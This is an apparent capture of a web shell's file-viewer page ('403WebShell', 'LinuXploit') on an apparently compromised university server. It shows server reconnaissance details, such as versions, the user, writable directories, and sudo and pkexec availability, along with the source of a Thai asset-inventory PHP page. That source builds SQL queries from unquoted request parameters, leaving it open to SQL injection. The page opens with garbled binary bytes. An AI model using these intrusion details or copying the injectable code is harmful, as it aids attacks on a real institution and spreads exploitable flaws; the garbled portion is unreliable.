h(  ) ($6;EbBLkfu�_l� ''8;DUFKV3Dd#,?ANk&5G$/(5M\^�ms����Sb�,;R''6c2I�!\����kx�Ve�[i��Me�IYO7:nOL~�Kr�qrv�I:�BM�y��s}r��K����x)1�6@r*2�89ma��&��'ti������{~#������t)1�2<�0:^5�W.uFzQ/u}�v��vv�u��U37yDJeEJo(/�5Ds'1�:Jlu�iy�iy�hw�1;:S`^BMLOQQn,4�7C�8C�>Lfe�]k�[i�Zg��IW�LZ�EP;,.��Tc�q(0) G,/]/1����w�r��l&-t*3�<<�u��#����j&.u��J68\8?"#$%&'()*+,-./0 ! 
Notice: Undefined index: dl in /var/www/html/web/simple.mini.php on line 1
403WebShell
403Webshell
Server IP : 10.254.12.21  /  Your IP : 10.254.12.21
Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.6.40
System : Linux arit.skru.ac.th 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64
User : apache ( 48)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /proc/5801/root/var/www/html/hardware/pages/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /proc/5801/root/var/www/html/hardware/pages/status-2023-11-23.php
<?php
/* ob_start();
 header( "location: http://arit.skru.ac.th/arit/IntroForm_Search.php" );
 exit(0);*/
?>
<?
//session_start();
?>
<?php include 'check_mode_admin.php';?>
<?php include 'dbconnect.php';?>
<?php include 'header_staff.php';?>

<?php
	$pagetitle_text = "รายการครุภัณฑ์แยกตามสถานะ";
	
	$assetcodehighlights = (isset($_GET["assetcode"])) ? $_GET["assetcode"] : '';

	$status_code1 = null;

	if(isset($_POST["status_code1"]))
	{
		$status_code1 = $_POST["status_code1"];
	}
	if(isset($_GET["status_code1"]))
	{
		$status_code1 = $_GET["status_code1"];
	}

	if ($status_code1<>"") {
		$sql = "SELECT * FROM hardware_mis_status WHERE status_code=" . $status_code1;
		$query = mysqli_query($conn,$sql);
		$result=mysqli_fetch_array($query,MYSQLI_ASSOC);
		$pagetitle_text .= " : " . $result["status_name"];
	} else { //if ($status_code1<>"") 
		$sql = "SELECT * FROM hardware_mis_status ORDER BY status_code ASC";
		$query = mysqli_query($conn,$sql);
		$result=mysqli_fetch_array($query,MYSQLI_ASSOC);
		$status_code1 = $result["status_code"];
		$pagetitle_text .= " : " . $result["status_name"];	
	} //if ($status_code1<>"") 
?>	
                        <h1 class="page-header"><?php echo $pagetitle_text;?></h1>		


<form name="frmstatus" method="post" action="<?php echo $_SERVER['SCRIPT_NAME'];?>">
  <table border="0">
    <tr>
	<td>เลือกสถานะครุภัณฑ์&nbsp;&nbsp;&nbsp;</td>
	<td><select class="form-control" name="status_code1" id="status_code1">
<?php
	$sql2 = "SELECT * FROM hardware_mis_status ORDER BY status_code ASC";
	$query2 = mysqli_query($conn,$sql2);	
	while($result2=mysqli_fetch_array($query2,MYSQLI_ASSOC))
	{
		if($result2["status_code"] == $status_code1) {
?>							
								<option value="<?php echo $result2["status_code"];?>" selected="selected"><?php echo $result2["status_name"];?></option>
<?php		
		} else { //if($result2["location_name"] == $result["text205"]) {
?>							
								<option value="<?php echo $result2["status_code"];?>"><?php echo $result2["status_name"];?></option>
<?php		
		} //if($result2["location_name"] == $result["text205"]) {
	} //while($result=mysqli_fetch_array($query,MYSQLI_ASSOC))
?>
	</select></td>
	<td>      
      &nbsp;&nbsp;&nbsp;<input type="submit" name="submit_status" value="ดูรายการครุภัณฑ์ตามสถานะที่เลือก">
    </td>
	</tr>
  </table>
</form>
<BR>

<?php	
	$sql = "SELECT * FROM hardware_mis";
	$sql .= " WHERE status_code=" . $status_code1;
	$sql .= " ORDER BY order_old ASC";

	$query = mysqli_query($conn,$sql);

	$num_rows = mysqli_num_rows($query);

	$per_page = 20;   // Per Page
	$page  = 1;
	
	if(isset($_GET["Page"]))
	{
		$page = $_GET["Page"];
	}

	$prev_page = $page-1;
	$next_page = $page+1;

	$row_start = (($per_page*$page)-$per_page);
	if($num_rows<=$per_page)
	{
		$num_pages =1;
	}
	else if(($num_rows % $per_page)==0)
	{
		$num_pages =($num_rows/$per_page) ;
	}
	else
	{
		$num_pages =($num_rows/$per_page)+1;
		$num_pages = (int)$num_pages;
	}

	$row_end = $per_page;

	$sql .= " LIMIT $row_start ,$row_end";
	$query = mysqli_query($conn,$sql);


?>
                                <table class="table table-striped table-bordered table-hover">
                                    <thead>
                                        <tr>
										<th><div align="center">รหัสครุภัณฑ์</div></th>
										<th><div align="center">รายการครุภัณฑ์</div></th>
										<th><div align="center">สถานะครุภัณฑ์</div></th>
										<th><div align="center">สถานที่ตั้ง/จัดเก็บ</div></th>										
										<th><div align="center">หมายเหตุ/เลขครุภัณฑ์เดิม</div></th>
										<th><div align="center">หน่วยนับ</div></th>
										<th><div align="center">มูลค่าครุภัณฑ์</div></th>
										<th><div align="center">วันที่ได้มา</div></th>
										<th><div align="center">แหล่งเงิน</div></th>
										<th><div align="center">คุณสมบัติ (ยี่ห้อ/รุ่น)</div></th>
										<th><div align="center">รูปภาพ</div></th>										
                                        </tr>
                                    </thead>
                                <tbody>
<?php
while($result=mysqli_fetch_array($query,MYSQLI_ASSOC))
{
	if($result["assetcode"]==$assetcodehighlights) {
?>	
									<tr style="background-color:#00FFFF;">
<?php
	} else {
?>
									<tr>
<?php	
	}
?>

										<td><a name="<?php echo $result["assetcode"];?>" id="<?php echo $result["assetcode"];?>"></a><a href="hardware_edit.php?assetcode=<?php echo $result["assetcode"];?>&status_code1=<?php echo $status_code1;?>&Page=<?php echo $page;?>"><?php echo $result["assetcode"];?></a></td>	
										<td><?php echo $result["assetnamex"];?></td>
										<td>
<?php
							if($result["status_code"]<>"") {
								$sql3 = "SELECT * FROM hardware_mis_status WHERE status_code=" . $result["status_code"];
								$query3 = mysqli_query($conn,$sql3);
								if($result3=mysqli_fetch_array($query3,MYSQLI_ASSOC)) {
									//echo $result3["status_name"];
?>
										<font color="<?php echo $result3["status_color"];?>"><?php echo $result3["status_name"];?></font>
<?php
								}
							}
											
?>										
										</td>
										<td><?php echo $result["text205"];?></td>										
										<td><?php echo $result["remark"];?></td>
										<td><?php echo $result["unitidx"];?></td>
										<td><?php echo number_format($result["dr"],2);?></td>
<?php										
											$date1=date_create($result["receive_date"]);
											$strYear = date_format($date1,"Y")+543;
											$strMonth= date_format($date1,"n");
											$strDay= date_format($date1,"j");
?>
										<td><?php echo $strDay . "/" . $strMonth . "/" . $strYear;?></td>
										<td><?php echo $result["budgetgroupidx"];?></td>
										<td><?php echo $result["spec"];?></td>																				
										<td>
<?php
	//$sql3 = "SELECT id,file_name FROM hardware_have_picture WHERE noid='" . $result["remark"] . "'";
	$sql3 = "SELECT file_name FROM hardware_mis_picture WHERE assetcode='" . $result["assetcode"] . "' ORDER BY id0 ASC";
	$query3 = mysqli_query($conn,$sql3);
	while($result3=mysqli_fetch_array($query3,MYSQLI_ASSOC)) {
?>										
												<p><a href="<?php echo "hardware_mis_picture/" . $result["assetcode"] . "/" . $result3["file_name"];?>" target="_blank"><img src="<?php echo "hardware_mis_picture/" . $result["assetcode"] . "/" . $result3["file_name"];?>" width ="200"/></a></p>	
<?php
	} //while($result3=mysqli_fetch_array($query2,MYSQLI_ASSOC))
?>
										</td>																					
                                    </tr>
<?php
}
?>									
                                </tbody>
                            </table>
                            <!-- /.table-responsive -->

<br>
<font size="+1">
จำนวน <?php echo $num_rows;?> รายการ<!-- (<?php //echo $num_pages;?> หน้า)-->
<br />หน้าที่ : 
<?php
if($prev_page)
{
	echo " <a href='$_SERVER[SCRIPT_NAME]?Page=$prev_page&status_code1=$status_code1'><< Back</a> ";
}

for($i=1; $i<=$num_pages; $i++){
	if($i != $page)
	{
		echo "[ <a href='$_SERVER[SCRIPT_NAME]?Page=$i&status_code1=$status_code1'>$i</a> ]";
	}
	else
	{
?>
</font><font size="+2">
<?php	
		echo "<b> $i </b>";
?>
</font><font size="+1">
<?php		
	}
}
if($page!=$num_pages)
{
	echo " <a href ='$_SERVER[SCRIPT_NAME]?Page=$next_page&status_code1=$status_code1'>Next>></a> ";
}							
?>
</font>
<BR><BR><BR>

<?php include 'footer.php';?>

Youez - 2016 - github.com/yon3zu
LinuXploit